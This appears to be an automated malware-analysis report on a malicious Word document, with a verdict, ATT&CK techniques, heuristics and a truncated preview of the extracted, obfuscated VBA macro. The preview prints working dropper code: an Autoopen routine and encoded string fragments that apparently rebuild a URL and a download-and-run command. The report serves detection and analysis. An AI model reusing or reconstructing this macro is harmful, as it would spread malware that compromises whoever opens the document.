Verdict: MALICIOUS
Risk Score: 142
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. The critical heuristic firing indicates the presence of a Shell() call within the VBA code, which is commonly used to execute arbitrary commands or download and run additional payloads. The AutoOpen macro further suggests an attempt at immediate execution upon opening the document. The obfuscated nature of the VBA code prevents a more detailed analysis of its specific actions.
Heuristics (5)
- VBA macros detected (medium, 2 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 118087 bytes | 36bd199c6b429ed4d5494b53cdc82f90d6495a84b8223f71dc6a88e44a0b27c2 |
Preview: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "qIsjsUf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub GzZBl(wLBst)
GormpC = RPAUdW
tHWHqD = dKppzT
URRSod = KzTNwS + Sgn(77525 - FdviK - ppuCp + Fix(87227)) - 55766 - CDbl(58107)
wpiMw = 95569
End Sub
Sub BpsfjJ(urlzV)
MuVJL = cXQzkT
vWYPFr = WbGli
jnzKDt = ZpCTY + Sgn(476 - VLlpI - CNfWb + Fix(61625)) - 15119 - CDbl(21753)
knjiYz = 78759
FwqLG = UEqFa
LqQdTk = HdjXm
rFOjtb = jnjtR + Sgn(237 - HLRlah - WuXGL + Fix(78413)) - 62716 - CDbl(64386)
WYEPPA = 10698
wiIIY = WLSoL
MwwEZV = qdiml
tKUNkh = FwowZ + Sgn(28090 - jBvsAV - hYcAqt + Fix(80045)) - 28236 - CDbl(83708)
rXIfA = 2860
End Sub
Sub iHEqPJ(fKXbp)
plQNLl = NunQrF
EBFSj = zKtQvS
bUfWO = JZFGu + Sgn(38943 - IkoTo - KkwdEF + Fix(84367)) - 79666 - CDbl(70500)
szSsXR = 85701
RCRvA = uKwVrM
ZcwIi = raRWjZ
NHcbqr = aClhOk + Sgn(96320 - uGWwYJ - XWktl + Fix(2659)) - 76846 - CDbl(487)
iWFkni = 43703
End Sub
Sub Autoopen()
On Error Resume Next
zTvXqO = thIjKz
AlvjFr = FqmCFz
iNuLks = ENuhHq + Sgn(99597 - sHqjw - UpEdf + Fix(64052)) - 87055 - CDbl(55549)
VlPCP = 37777
sOBlwwww (UaHmw + AHmRQqZDIRTn + ACzAz)
wiMYC = KYpiE
FbEZv = nklimP
KZwoC = ijsiiJ + Sgn(24836 - jEvYm - wjUTb + Fix(12275)) - 10129 - CDbl(24892)
PTrwz = 85758
End Sub
Sub OjnDZa(zZPif)
jpGAu = dFcMwa
XcKnN = UlqMk
vVSXuM = ZFjaN + Sgn(83450 - WPqlW - dHDlmm + Fix(3798)) - 40930 - CDbl(21650)
qdVRw = 13411
iiAYA = rBzvL
FuEptG = RhkIKC
jqwsa = PEHDW + Sgn(36029 - vMjpqq - GblobL + Fix(20222)) - 78838 - CDbl(56170)
aqWlcA = 10088
VIaAm = TadsF
vRTXII = IQOsa
KdfwqT = ikUiD + Sgn(10376 - kVBhSj - BIWwdT + Fix(93339)) - 94033 - CDbl(77919)
PAZcY = 75676
End Sub
Sub mYtTKw(UDUUnP)
arvIUJ = NzPhwO
DfLLh = vtpMr
kiazc = ZZpId + Sgn(37975 - djZYi - OiTQXI + Fix(15901)) - 10655 - CDbl(85306)
jBjRIZ = 37486
End Sub
Attribute VB_Name = "AmXWpduCsHEq"
Sub VLacd(NDrUE)
nIHtCv = MmYrO
tpVUQA = BQLqJ
iIFjIS = pBVnI + Sgn(80668 - zdjwT - kkbri + Fix(51433)) - 38116 - CDbl(4924)
WzRjMQ = 92658
End Sub
Function AHmRQqZDIRTn()
On Error Resume Next
DPZuC = UiLanB
hPWzF = jNAiwR
fYVYd = DWjjuR + Sgn(65127 - GJWAjA - phumH + Fix(42649)) - 29507 - CDbl(87767)
hadrM = 93196
MvYsTi = jdPKZ
LWMvR = ibFdjz
nASUS = NSPRHj + Sgn(64632 - YZjsR - zGGEL + Fix(74897)) - 81778 - CDbl(63552)
GSrvL = 82842
IFBwIFzDm = mjTjPa("5QqZz:p'+'tth@/s5'+'5q'+'Jm/ed'+'.zlas-'+'vdejE", 24806 + 3 - 24806, 24806 + 40 - 24806)
QJwhM = vFEMkq
BYlOl = htOIj
jvIzPn = LOIXv + Sgn(70274 - AKBzzC - aVihdJ + Fix(5802)) - 19210 - CDbl(31654)
AQufD = 74763
XNaSj = jtTLGH
uqooEi = Dlpaj
wnCiT = PmWPT + Sgn(39741 - REZqmq - BtciJo + Fix(83178)) - 54867 - CDbl(7413)
YzjYtv = 81589
luNsJXMmMEW = mjTjPa("7I7]rAHc[+38]rAHc[( EcALPErc-)'}}{h'S2z,", 11607 + 5 - 11607, 11607 + 35 - 11607)
srstYa = UHQGd
DjlGFL = ViXmj
rUlYYJ = BuzFHV + Sgn(2620 - phbWa - VPzRnj + Fix(41246)) - 37186 - CDbl(26299)
FKojA = 67106
vPJKu = EQLWdC
pkZjR = jRNSJz
DDVXo = WfOLw + Sgn(42739 - TniOb - obDZAn + Fix(41667)) - 64132 - CDbl(37674)
hzzNVj = 2463
nipwBsDWP = mjTjPa("OBoc))93]rAHc[,)47]rAHc[+35]rAHc[+94]rAHc[(ecaLper-29]rAHc[,'fsoDADsc", 66983 + 6 - 66983, 66983 + 60 - 66983)
nhEfVa = dNLjt
zraIwA = UkTrCw
OwIlnm = atfJGd + Sgn(563 - aKBav - GZEXjW + Fix(52033)) - 6462 - CDbl(28614)
cYsKj = 8375
idYwj = qojWZ
cvHpD = VXEWGi
qPDBQA = nURXuc + Sgn(73920 - vzaRz - hNiKo + Fix(24788)) - 25823 - CDbl(51549)
IXqLp = 89647
FUuucaUiiu = mjTjPa("hF+'cta'+'c}'+';k'+'a'+'erb;)'+'C'+'DSAk4()'+'J51'+'me'+'tI-eJ51+J51kJ51+'+'J5'+'1ovnIJ51(&'+';)CDS'+'A'+'k4 ,'+')(DN'+'SgN5ZPi5'+'Z'+'PrtSoTDNS3%73", 49734 + 5 - 49734, 49734 + 142 - 49734)
nPVwjH = jvbzVb
vojbJ = VrcoP
CJAER = FILKwC + Sgn(53343 - iwPNN - zMMjHj + Fix(61883)) - 85966 - CDbl(32159)
nhhXFV = 68875
VzUnz = zJKuEp
dbXZFp = OOpjT
QOpQct = sYfSP + Sgn(52465 - QTBALR - ajtUb + Fix(62786)) - 18079 - CDbl(21600
... (truncated)